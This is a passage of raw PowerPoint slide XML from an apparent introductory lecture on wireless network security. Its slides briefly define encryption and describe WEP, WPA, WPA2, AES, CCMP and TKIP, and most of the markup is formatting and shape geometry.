                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-130" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="30" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n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spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="105" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>s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spc="5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-114" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e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spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="240" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-114" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>k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spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="30" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d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spc="-114" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-130" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-380" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>.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spc="-509" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="105" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="240" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="105" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>s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spc="30" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a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spc="30" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>y  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="105" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="240" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="30" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="35" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>g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spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t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w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h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spc="-55" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="40" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>secret </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="114" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-110" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-105" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-130" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>y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spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>z</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="30" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>devices </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>decipher.</a:t>
            </a:r>
            <a:endParaRPr sz="3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3488"/>
            <a:ext cx="17373600" cy="1261872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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 of Wireless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1481912" y="2236429"/>
            <a:ext cx="5638800" cy="3986140"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2906466" lvl="4" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WEP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2090044" lvl="3" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>WEP is an encryption algorithm for  IEEE 802.11 wireless networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2090044" lvl="3" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> It is old and original wireless security standard which can be cracked easily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1632844" lvl="3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7488" y="2171700"/>
            <a:ext cx="6172200" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1632844" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>                  WPA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>It is an advanced wireless encryption protocol using TKIP,MIC, and AES encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>   Uses a 48 bit IV, 32 bit CRC and TKIP encryption  for wireless security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3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48600" y="1982569"/>
            <a:ext cx="98709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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>		WPA2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>WPA2 uses AES(128 bit) and CCMP for wireless data Encryption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8600" y="3174068"/>
            <a:ext cx="981089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		AES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>It is symmetric-key encryption, used in WPA2 as  a replacement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Of TKIP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6732037"/>
            <a:ext cx="6781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	 CCMP                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Counter Mode with Cipher Block Chaining Message Authentication Code. Protocol CCMP utilizes 128-bit keys , with a 48 bit initialization vector(IV) for replay detection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92482" y="4926734"/>
            <a:ext cx="941796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			TKIP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="20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Temporal Key Integrity Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="28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)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A Security  protocol used in WPA as a replacement for WEP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18FF9F-6F9A-D870-95C5-88D352ADF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603056"/>
            <a:ext cx="1028789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5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D01C1E-A481-0B7D-3600-368833ADACAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="978192" y="952500"/>
            <a:ext cx="16277539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3600" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F353D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SST W01 Roman"/>
              </a:rPr>
              <a:t>Wired Equivalent Privacy(WEP) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2F353D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="SST W01 Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l" fontAlgn="base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inherit"/>
              </a:rPr>
              <a:t>WEP is an IEEE 802.11 wireless protocol which provides security algorithms for data   confidentiality during wireless transmission.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l" fontAlgn="base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latin typeface="inherit"/>
              </a:rPr>
              <a:t>WEP uses a 24-bits initialization vector (IV) to form a stream cipher RC4 for the CRC 32 checksum for integrity of wireless transmission.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200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5C36A13-B698-0763-D076-9F9E5E933A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9469477"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="4821903"/>
          <a:ext cx="6946608" cy="452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9C3EA79A-FDA5-7A0A-F18C-BC1B82E5D776}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9296400" y="5111757"/>
            <a:ext cx="8686800" cy="2458761"/>
            <a:chOff x="9296400" y="5111757"/>
            <a:chExt cx="8686800" cy="2458761"/>
          </a:xfrm>
          <a:noFill/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213B0-140C-2FD0-F4F5-56C3B43678B5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9296400" y="5111757"/>
              <a:ext cx="8686800" cy="914400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY0" fmla="*/ 164431 h 986565"/>
                <a:gd name="connsiteX1" fmla="*/ 164431 w 8686800"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 986565"/>
                <a:gd name="connsiteX2" fmla="*/ 8522369 w 8686800"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 986565"/>
                <a:gd name="connsiteX3" fmla="*/ 8686800 w 8686800"/>
                <a:gd name="connsiteY3" fmla="*/ 164431 h 986565"/>
                <a:gd name="connsiteX4" fmla="*/ 8686800 w 8686800"/>
                <a:gd name="connsiteY4" fmla="*/ 822134 h 986565"/>
                <a:gd name="connsiteX5" fmla="*/ 8522369 w 8686800"/>
                <a:gd name="connsiteY5" fmla="*/ 986565 h 986565"/>
                <a:gd name="connsiteX6" fmla="*/ 164431 w 8686800"/>
                <a:gd name="connsiteY6" fmla="*/ 986565 h 986565"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY7" fmla="*/ 822134 h 986565"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY8" fmla="*/ 164431 h 98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6800" h="986565">
                  <a:moveTo>
                    <a:pt x="0" y="164431"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="73618"/>
                    <a:pt x="73618" y="0"/>
                    <a:pt x="164431" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8522369" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8613182" y="0"/>
                    <a:pt x="8686800" y="73618"/>
                    <a:pt x="8686800" y="164431"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8686800" y="822134"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8686800" y="912947"/>
                    <a:pt x="8613182" y="986565"/>
                    <a:pt x="8522369" y="986565"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="164431" y="986565"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="73618" y="986565"/>
                    <a:pt x="0" y="912947"/>
                    <a:pt x="0" y="822134"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="16443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0560" tIns="200560" rIns="200560" bIns="200560" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="0" indent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200" kern="1200" baseline="0" dirty="0"/>
                <a:t> Not fully secure.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9E2951-3FEA-6B97-8ECC-82F0EDEE0C36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9296400" y="5819849"/>
              <a:ext cx="8686800" cy="430560"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 430560"/>
                <a:gd name="connsiteX1" fmla="*/ 8686800 w 8686800"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 430560"/>
                <a:gd name="connsiteX2" fmla="*/ 8686800 w 8686800"/>
                <a:gd name="connsiteY2" fmla="*/ 430560 h 430560"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY3" fmla="*/ 430560 h 430560"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 43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6800" h="430560">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8686800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8686800" y="430560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="43056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5806" tIns="33020" rIns="184912" bIns="3302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endParaRPr lang="en-IN" sz="2000" kern="120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A9E9CF4-9FE4-2938-BB65-D547FBB687FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9296400" y="6595284"/>
              <a:ext cx="8686800" cy="888952"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY0" fmla="*/ 148261 h 889548"/>
                <a:gd name="connsiteX1" fmla="*/ 148261 w 8686800"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 889548"/>
                <a:gd name="connsiteX2" fmla="*/ 8538539 w 8686800"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 889548"/>
                <a:gd name="connsiteX3" fmla="*/ 8686800 w 8686800"/>
                <a:gd name="connsiteY3" fmla="*/ 148261 h 889548"/>
                <a:gd name="connsiteX4" fmla="*/ 8686800 w 8686800"/>
                <a:gd name="connsiteY4" fmla="*/ 741287 h 889548"/>
                <a:gd name="connsiteX5" fmla="*/ 8538539 w 8686800"/>
                <a:gd name="connsiteY5" fmla="*/ 889548 h 889548"/>
                <a:gd name="connsiteX6" fmla="*/ 148261 w 8686800"/>
                <a:gd name="connsiteY6" fmla="*/ 889548 h 889548"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY7" fmla="*/ 741287 h 889548"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 8686800"/>
                <a:gd name="connsiteY8" fmla="*/ 148261 h 88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6800" h="889548">
                  <a:moveTo>
                    <a:pt x="0" y="148261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="66379"/>
                    <a:pt x="66379" y="0"/>
                    <a:pt x="148261" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8538539" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8620421" y="0"/>
                    <a:pt x="8686800" y="66379"/>
                    <a:pt x="8686800" y="148261"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8686800" y="741287"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8686800" y="823169"/>
                    <a:pt x="8620421" y="889548"/>
                    <a:pt x="8538539" y="889548"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148261" y="889548"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="66379" y="889548"/>
                    <a:pt x="0" y="823169"/>
                    <a:pt x="0" y="741287"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="148261"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grpFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:shade val="80000"/>
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                </a:schemeClr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344" tIns="165344" rIns="165344" bIns="165344" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="354965" marR="5080" indent="-342900">
                <a:lnSpc>
                  <a:spcPct val="115599"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="100"/>
                </a:spcBef>
                <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="65" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>WEP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-140" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>encryption</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-135" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" spc="-15" dirty="0">
                  <a:latin typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                </a:rPr>
                <a:t>is</a:t>
              </a:r>
              <a:r>
